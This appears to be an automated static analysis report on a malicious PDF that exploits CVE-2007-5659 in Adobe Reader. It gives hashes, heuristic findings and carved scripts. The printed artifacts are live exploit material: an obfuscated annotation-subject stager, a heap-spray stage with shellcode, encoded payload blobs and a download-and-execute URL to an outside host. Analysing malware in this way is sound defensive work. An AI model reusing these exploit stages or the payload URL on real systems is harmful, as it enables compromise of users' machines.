Malicious PDF — malware analysis report

Static analysis result for SHA-256 17164fc21ce44bf5…

MALICIOUS

PDF

16.2 KB
MD5: b92b400e0789adf5858fa70c57f7e725 SHA-1: a9ca8e7b9aef74e520e0eaefc44baf14bea354ae SHA-256: 17164fc21ce44bf5866734bd97d34ec3bdc62f4669e05b7d50d30231980fdf78
406 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution T1059.007 JavaScript

The PDF document contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed as a multi-stage dropper, first decoding a payload from an annotation subject and then executing it. This payload is responsible for downloading a second-stage shellcode from the URL http://4winx.com/cgi-bin/rtm/n00a106201r0409R1a084c54Xb4cb7476Y2b92b61b. The presence of exploit-related heuristics and the embedded URL strongly indicate a malicious intent to compromise the user's system.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://4winx.com/cgi-bin/rtm/n00a106201r0409R1a084c54Xb4cb7476Y2b92b61b Referenced by PDF JavaScript

Extracted artifacts 4

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d		 pdf-javascript-stream PDF /JS object 9 at offset 0x3E53 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
69091bbe9311e6b5e10ebc75f30262ebf2dcb6ca37a7da16a494575ef5541d63		 deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x194B 5084 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var Yr0N_Y_o0___5_e = new Array();var y___8___3 = 0;var PWQ_Mgx_oEnI = "";function S7_4FpI1VcV5h(l_0_Qocb6q33f3, q__75__2__j3_t){var s1W_e_L__f___ry = q__75__2__j3_t.toString();var Msb22hENfAc_A2 = "";for(var wdCdK258Vr = 0; wdCdK258Vr < s1W_e_L__f___ry.length; wdCdK258Vr++) {var O_gs_iIr = parseInt(s1W_e_L__f___ry.substr(wdCdK258Vr, 1));if (!isNaN(O_gs_iIr)) {O_gs_iIr = O_gs_iIr.toString(16);if (O_gs_iIr.length == 1) { O_gs_iIr = "0" + O_gs_iIr; }else if (O_gs_iIr.length != 2) { O_gs_iIr = "00"; }Msb22hENfAc_A2 = O_gs_iIr + Msb22hENfAc_A2;if (Msb22hENfAc_A2.length == 8) {break;}}}while(Msb22hENfAc_A2.length < 8) { Msb22hENfAc_A2 = "0" + Msb22hENfAc_A2; }var y2_0j8 = l_0_Qocb6q33f3.toString(16);if (y2_0j8.length == 1) { y2_0j8 = "0" + y2_0j8; }else if (y2_0j8.length != 2) { y2_0j8 = "00"; }Msb22hENfAc_A2 = "3" + y2_0j8 + "P" + Msb22hENfAc_A2;return Msb22hENfAc_A2;}function V_4_Eb33(Uky1IL0_4_Ef, t_vDG_L3_IRo5b){var aEV_OaUT = new Array("");var d6L_35D_bFn = Uky1IL0_4_Ef;var lg8_Yn_6M_C2;if ((lg8_Yn_6M_C2 = Uky1IL0_4_Ef.lastIndexOf("%u00")) != -1) {if (lg8_Yn_6M_C2 + 6 == Uky1IL0_4_Ef.length) {aEV_OaUT[0] = Uky1IL0_4_Ef.substr(lg8_Yn_6M_C2 + 4, 2);d6L_35D_bFn = Uky1IL0_4_Ef.substring(0, lg8_Yn_6M_C2);}}lg8_Yn_6M_C2 = 1;for (wdCdK258Vr = 0; wdCdK258Vr < t_vDG_L3_IRo5b.length; wdCdK258Vr++) {var iNF_2u7H8f20 = t_vDG_L3_IRo5b.charCodeAt(wdCdK258Vr).toString(16);if (iNF_2u7H8f20.length == 1) { iNF_2u7H8f20 = "0" + iNF_2u7H8f20; }aEV_OaUT[lg8_Yn_6M_C2] = iNF_2u7H8f20;lg8_Yn_6M_C2++;}wdCdK258Vr = aEV_OaUT[0].length ? 0 : 1;aEV_OaUT[lg8_Yn_6M_C2] = "00";aEV_OaUT[lg8_Yn_6M_C2 + 1] = "00";lg8_Yn_6M_C2 += 2;if ((aEV_OaUT.length - wdCdK258Vr) % 2) {aEV_OaUT[lg8_Yn_6M_C2] = "00";}while(wdCdK258Vr < aEV_OaUT.length) {d6L_35D_bFn += "%u" + aEV_OaUT[wdCdK258Vr + 1] + aEV_OaUT[wdCdK258Vr];wdCdK258Vr += 2;}d6L_35D_bFn += "%u0000";return d6L_35D_bFn;}function A1_fS2_8o(b2_B__sIau_i, C_5M0H){while (b2_B__sIau_i.length*2<C_5M0H) {b2_B__sIau_i += b2_B__sIau_i;}b2_B__sIau_i = b2_B__sIau_i.substring(0,C_5M0H/2);return b2_B__sIau_i;}function YT__24E_t__g(FeYC_Yv, WT4fr0C0, UY228G){var h0hS4_J6b_P = 0x0c0c0c0c;var b2_B__sIau_i = unescape(WT4fr0C0);var t_vDG_L3_IRo5b = S7_4FpI1VcV5h(FeYC_Yv, UY228G);var m_2_h6 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51%u33ff%u64db%u2389%u026a%u8b59%uf3fb%u75af%uff07%u66e7%ucb81%u0fff%ueb43%ue8ed%uffda%uffff%u0c6a%u8b59%u0c04%ub8b1%u0483%u0608%u8358%u10c4%u3350%uc3c0");var Uky1IL0_4_Ef = "%u9050%u9050%u9050%u9050" + "%u9090%u9090%u9090%u9090%ufbe9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c%u1c70%u8bad%u2068%u7d80%u330c%u0374%ueb96%u8bf3%u0868%uf78b%u046a%ue859%u008f%u0000%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u8b16%ue8e8%u0079%u0000%ud78b%u8047%u003f%ufa75%u5747%u8047%u003f%ufa75%uef8b%u335f%u81c9%u04ec%u0001%u8b00%u51dc%u5352%u0468%u0001%uff00%u0c56%u595a%u5251%u028b%u4353%u3b80%u7500%u81fa%ufc7b%u652e%u6578%u0375%ueb83%u8908%uc703%u0443%u652e%u6578%u43c6%u0008%u8a5b%u04c1%u8830%u0045%uc033%u5050%u5753%uff50%u1056%uf883%u7500%u6a06%u5301%u56ff%u5a04%u8359%u04c2%u8041%u003a%ub475%u56ff%u5108%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be%uf238%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd%u8b04%uc503%u5eab%uc359%u00e8%uffff%u8eff%u0e4e%u98ec%u8afe%u7e0e%ue2d8%u3373%u8aca%u365b%u2f1a%u6870%u4768%u0077%u7468%u7074%u2f3a%u342f%u6977%u786e%u632e%u6d6f%u632f%u6967%u622d%u6e69%u722f%u6d74%u6e2f%u3030%u3161%u3630%u3032%u7231%u3430%u3930%u3152%u3061%u3438%u3563%u5834%u3462%u6263%u3437%u3637%u3259%u3962%u6232%u3136%u0062";app.y_Hd52_37rq = unescape(V_4_Eb33(Uky1IL0_4_Ef, t_vDG_L3_IRo5b));var QdxCm0 = 0x400000;var kr_sc81u = m_2_h6.length * 2;var C_5M0H = QdxCm0 - (kr_sc81u+0x38);b2_B__sIau_i = A1_fS2_8o(b2_B__sIau_i, C_5M0H);var y_P7__58e = (h0hS4_J6b_P - 0x400000)/QdxCm0;for (var Ms_3Y__4Y6 = 0; Ms_3Y__4Y6 < y_P7__58e; Ms_3Y__4Y6++) {Yr0N_Y_o0___5_e[Ms_3Y__4Y6] = b2_B__sIau_i + m_2_h6;}}function S2_1c_hQ(){var Qc____n_N = "";for (wdCdK258Vr = 0; wdCdK258Vr < 12; wdCdK258Vr++) {Qc____n_N += unescape("%u0c0c%u0c0c");}var V_M
... (truncated)
legacy_pdfkit_stage_000.js
45e1055b13ce71f5ea7ac3d8c2232711127ab75a04e17d2c4714b94d3c177652		 deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x199F 11379 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function bV_K8IomUAbXG(V4F2_8, yJ___Ox){var y2D_I_M_h = new Array();var vNr6nO46_d = 512;var np2jw_UU = 21;var VX_5_O_3 = 0;var e4st_df_U4B_u6 = 0;var g_6C__DO67 = 0;var pUJ2fBI2m = "";var nWL05H3ERL = "";var s_oqh_V_0XUw = 6;try {var M02_R_3 = 0;if (app) {g_6C__DO67 = g_6C__DO67 + 2;yJ___Ox = pr[M02_R_3].subject;}} catch(e) { }g_6C__DO67 = g_6C__DO67 + 5;if (!V4F2_8) { y2D_I_M_h = new Array(59,56,148,233,89,128);} else {y2D_I_M_h = V4F2_8;}var bg_6_sxBxED = 0;var T22__NEHg0R0_D = 0;var RyDAdc3_acyFd = 0;while(T22__NEHg0R0_D < yJ___Ox.length) {var P47U74_c7Qk = yJ___Ox.substr(T22__NEHg0R0_D, 2);var Y0_0___63 = parseInt(P47U74_c7Qk, 21);if (bg_6_sxBxED >= s_oqh_V_0XUw) {bg_6_sxBxED = 0;}Y0_0___63 -= y2D_I_M_h[bg_6_sxBxED] * (RyDAdc3_acyFd + 2);var vNJJNV_B = Math;if (Y0_0___63 < 0) {Y0_0___63 -= vNJJNV_B.floor(Y0_0___63 / 256) * (vNr6nO46_d*2/4);}if (T22__NEHg0R0_D >= 0) {Y0_0___63 = String.fromCharCode(Y0_0___63);}if (g_6C__DO67 == 6) {pUJ2fBI2m += OPi_B_AT73xx;} else if (g_6C__DO67 == 7) {pUJ2fBI2m += Y0_0___63;} else {pUJ2fBI2m += T22__NEHg0R0_D;}bg_6_sxBxED++;T22__NEHg0R0_D += 2;RyDAdc3_acyFd++;}var BpG__O_1v3bf = this;BpG__O_1v3bf['ev'+'al'](pUJ2fBI2m);}
	bV_K8IomUAbXG(0, "b509958556bb08371i486db8517k7ca65ead018gbe0f99aj5c0858a5aeafa74c9k11bjaf2a807688biad482dbg1hah7d9639315f2iaf4675a60a23ad74255f6a4d98154d75aa1j7f267g426c6eahai1ca5bi40a1094j0k388i9c4h868j9g72b1910k2518a39k4j478276c18b6f86bc0595ba16bg566612ad3h380f2501adbd4d7g8936bb02bk9k0845aj7g1f5e685dad0569021137901jb24j595a8d9c1i8ab189b3c35e5323aab863aaagacb5b08gaf1e4dbebb0i41a196aa8a8k7a1h2j01ah10b264540j7d2g15031k47bb7f917e831dbg31a917bj3b8d5d2k7f36527d9j5a9b0i80964ia13j376ka4a4bha27kah8918695c48a0ad69acb0a0bkbb03bf533f1bb04c628b6130ai6j9f2h070j8g0620705d187d6f603229209ia1929e736b9c399b0d9g7jaf825285538ibd958jbab994aj47ai7455acad90381dc28kbc2b777856118076b5aha3058a8h0g5545c07d123i8h753gak4k7d1k2i569h0b11807558b0615e4d087781746ab4667ab034123ibd997d561j87629kbcbc941c0986bd4hbk9761c3b7921bbi8ha38j1e864c1c0had650b12a61cbb8440723k41bd3944aj751f89528078ba50ad0b3cbg885gbb1h4h26ad5d7f6a7g80648jb02j1i50bbai8j3d72ab6dbkaj869k428d999i3g1aa951189c972c3dak2eb01j935f13187d399kb9b1119ia54b8j335c9c3d4kc15g3588538i5ab88d9g0h3bag5e8e983f7b501996947180ab3i9cad213c5e0ga7bb373k885114ag8i8257a60aak2121ad3b048j8d60137k2bbc0g777f49349h5dbi3c9d418a7d5b983g6jbd2i5f10714c8g4b9b9e259bajbi4f0393b2c15888811gb080810b154d9db1032c73ak0had4d51a4691kb7b2c06a89117d17018g640g9g8h6c33875598bfac9c425i942ib12j6b40886g2e7gc372bc26771d907g9h73bi9e208d8a9g1j498fb4bb0k9k6c119jb36g9b0d3e1dadb143760i25ag3h8hbc3d398b820c7kag53bb38421223308e505a6jaf3580168ic31c7h8g28355ka38fbd9h399g156889ba75655abe8a6bbhb3018a90842g1j4d9b830eaf7f0kb7b36abc08802fb51g54620a3h7d2i9k0a5d26b386a48kbb66b03d4cb11f507d53584cbd4ebi9hbgb1456i7d2h083j727b7f78441g1jbgagbd8i6a73b1ak4h2hbg08ag7d96392857b17d0j7501aj2h888c001b400i7fc02g759d1j9g639d1d386898911981b7709404343j4i91be7j995f97a1ag9ba82e2897ak2f477k7h918ja5862b3805bd1g077j560ead3j38be1i018b806f708c109c248gc3aj459882042e7856bfb356b8b245ad3i9d5e397b81aj2kafbk59af0h55433f9ca3646a8572b5aj07a61k4906af52266465a18j9d8h3bbg1f8e0207656415ad5h2k2cah1k7d9i8b8h513c9f0cbgb50e49ak5g4a6j743fb5075707bd8aad2ea361406e8j9g2k8g8775b5234c5642bdad4a98b08e9h7d9ab1414021892b4g8091c0ad709h193230bc1f01a48745bh4d5508ah25be7h6a5h4c3a7dbgajb9a84j81445a896b53800687bhbh8jb7479h67558j8a600j9j8j8690c1445k4i188952a29j9jb7ad9c2k373k2bb73e79bh6806bk81904a283cafc317a95g567d3a2e3e207e898f8c7d7159ad101911199cag7i5ja03aa4b09f8f2705ad8e340770308e835f22bd7gac81be845d361c8b3iaa129k19b77b1g3h2g45bi0h63bd6d4f8c7e9g68c36fbe063c0c8h76b7543h31b24ib59i88b06e9dad00104bb57h814j72be6db88gb6944abda29g3gbk7721ba7d653437b92i7daa9i8k2g359e39ab08964k7d8d135f1922bg2k6d1f7h408d5bb782b85b7d0i381h6b72ad3d5269048eb874b39h7aadb7213d62ag88bg6c52bd4ka68d939h5h91b0810a34bf51357d8d4i2kac15beaj888047268826be08ad5abf8e3g922349ad1882386e7f86760g893076b8c049098f71bg4a6d7h048c8d71b7204499bd232h7h1212b7694ca73ib68jb4b7318h349h202d9d5j1i9b606g33852ab50dakb84j667d38051b77477db02eaf236gad00ab1i7a73ak4eb16a08717f9520005382b2337b8fb2108f7bae2c4bak8ja65c81b
... (truncated)
deobfuscated.js
ec81672888886ad20e90014b144f9a2d46574f2a17de48f8e7a4b0fbfdf95cfe		 deobfuscated-js PDF JavaScript deobfuscation pass 132524 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
b509958556bb08371i486db8517k7ca65ead018gbe0f99aj5c0858a5aeafa74c9k11bjaf2a807688biad482dbg1hah7d9639315f2iaf4675a60a23ad74255f6a4d98154d75aa1j7f267g426c6eahai1ca5bi40a1094j0k388i9c4h868j9g72b1910k2518a39k4j478276c18b6f86bc0595ba16bg566612ad3h380f2501adbd4d7g8936bb02bk9k0845aj7g1f5e685dad0569021137901jb24j595a8d9c1i8ab189b3c35e5323aab863aaagacb5b08gaf1e4dbebb0i41a196aa8a8k7a1h2j01ah10b264540j7d2g15031k47bb7f917e831dbg31a917bj3b8d5d2k7f36527d9j5a9b0i80964ia13j376ka4a4bha27kah8918695c48a0ad69acb0a0bkbb03bf533f1bb04c628b6130ai6j9f2h070j8g0620705d187d6f603229209ia1929e736b9c399b0d9g7jaf825285538ibd958jbab994aj47ai7455acad90381dc28kbc2b777856118076b5aha3058a8h0g5545c07d123i8h753gak4k7d1k2i569h0b11807558b0615e4d087781746ab4667ab034123ibd997d561j87629kbcbc941c0986bd4hbk9761c3b7921bbi8ha38j1e864c1c0had650b12a61cbb8440723k41bd3944aj751f89528078ba50ad0b3cbg885gbb1h4h26ad5d7f6a7g80648jb02j1i50bbai8j3d72ab6dbkaj869k428d999i3g1aa951189c972c3dak2eb01j935f13187d399kb9b1119ia54b8j335c9c3d4kc15g3588538i5ab88d9g0h3bag5e8e983f7b501996947180ab3i9cad213c5e0ga7bb373k885114ag8i8257a60aak2121ad3b048j8d60137k2bbc0g777f49349h5dbi3c9d418a7d5b983g6jbd2i5f10714c8g4b9b9e259bajbi4f0393b2c15888811gb080810b154d9db1032c73ak0had4d51a4691kb7b2c06a89117d17018g640g9g8h6c33875598bfac9c425i942ib12j6b40886g2e7gc372bc26771d907g9h73bi9e208d8a9g1j498fb4bb0k9k6c119jb36g9b0d3e1dadb143760i25ag3h8hbc3d398b820c7kag53bb38421223308e505a6jaf3580168ic31c7h8g28355ka38fbd9h399g156889ba75655abe8a6bbhb3018a90842g1j4d9b830eaf7f0kb7b36abc08802fb51g54620a3h7d2i9k0a5d26b386a48kbb66b03d4cb11f507d53584cbd4ebi9hbgb1456i7d2h083j727b7f78441g1jbgagbd8i6a73b1ak4h2hbg08ag7d96392857b17d0j7501aj2h888c001b400i7fc02g759d1j9g639d1d386898911981b7709404343j4i91be7j995f97a1ag9ba82e2897ak2f477k7h918ja5862b3805bd1g077j560ead3j38be1i018b806f708c109c248gc3aj459882042e7856bfb356b8b245ad3i9d5e397b81aj2kafbk59af0h55433f9ca3646a8572b5aj07a61k4906af52266465a18j9d8h3bbg1f8e0207656415ad5h2k2cah1k7d9i8b8h513c9f0cbgb50e49ak5g4a6j743fb5075707bd8aad2ea361406e8j9g2k8g8775b5234c5642bdad4a98b08e9h7d9ab1414021892b4g8091c0ad709h193230bc1f01a48745bh4d5508ah25be7h6a5h4c3a7dbgajb9a84j81445a896b53800687bhbh8jb7479h67558j8a600j9j8j8690c1445k4i188952a29j9jb7ad9c2k373k2bb73e79bh6806bk81904a283cafc317a95g567d3a2e3e207e898f8c7d7159ad101911199cag7i5ja03aa4b09f8f2705ad8e340770308e835f22bd7gac81be845d361c8b3iaa129k19b77b1g3h2g45bi0h63bd6d4f8c7e9g68c36fbe063c0c8h76b7543h31b24ib59i88b06e9dad00104bb57h814j72be6db88gb6944abda29g3gbk7721ba7d653437b92i7daa9i8k2g359e39ab08964k7d8d135f1922bg2k6d1f7h408d5bb782b85b7d0i381h6b72ad3d5269048eb874b39h7aadb7213d62ag88bg6c52bd4ka68d939h5h91b0810a34bf51357d8d4i2kac15beaj888047268826be08ad5abf8e3g922349ad1882386e7f86760g893076b8c049098f71bg4a6d7h048c8d71b7204499bd232h7h1212b7694ca73ib68jb4b7318h349h202d9d5j1i9b606g33852ab50dakb84j667d38051b77477db02eaf236gad00ab1i7a73ak4eb16a08717f9520005382b2337b8fb2108f7bae2c4bak8ja65c81b11dad508110542jb5ah9j74b14iad0k2b0f3931ab4c5c39ai5999018i101j648g510a397f8kb07b69b23c988e10a53c677k834h36bg23a3aia53b235ec2bb0e7i6i1103a487073a621ja9ag4h6g0d3gb75i9f312d307d7j9b6c85388j2f2j194e5iaf6h7978aj818gbkba1h3f6g9g49214e956g906246a60b7j8j1e9g5d88b2af5g22bc29128gaj636079c09g388j8ia1077d5i1g1b4i0i7faa3977a85bb0379a3a655k8e9012839040830f1j0i2i8bak406262a67ia4bebg27339d864g498e9d00b15h5cae3h06961bah5166b9a46i0h9jb3b78a81447g791ka432a501063fa988303h6850b7054aabc0508a4h7536294a8877b38j069cb12b66491iadai589f8j7k8b8gak20081i8caf2d4a92880ba38068352i24b0200g5g543iai3f351ibf1c97a782687k1d83148ga8a26f7f4a0j3h685aa4c36909b975a95gb54f5c7i8a760gb7bi6i83ak455418897d6b90aca0b4afad17474c11963h4f827100a49398213d33960k03776222a4661j0bc2208a87a38k5453ad09ab0k0c75997j135a4c537f9290b99c6k8819a1825bb5be9j429jb2979f1a52493003ag4kbfa9b71bbebb2h6e3h30b70650948k3da15ha531331fagaa1i958058bc415g54196j846g839i516d8813af4f1d8kb27b54623a9f8abc772dbfbc9c4318875d97b5904i25bg0k82b5666544bg9g3daeaf6h3kag883859353ebc1k76188i547d549831293dadak2dbg8i5gaf5i695gbh96ag77a59d6k8jbc0j1k5c08a97d502ea83ib095b69a4facc3be3g1c73601kag985j3jb32eb0aa6a662g308d4fa613791j818b51854363bb394k1d6d639578bg831376bec13ib4958cbe5578
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.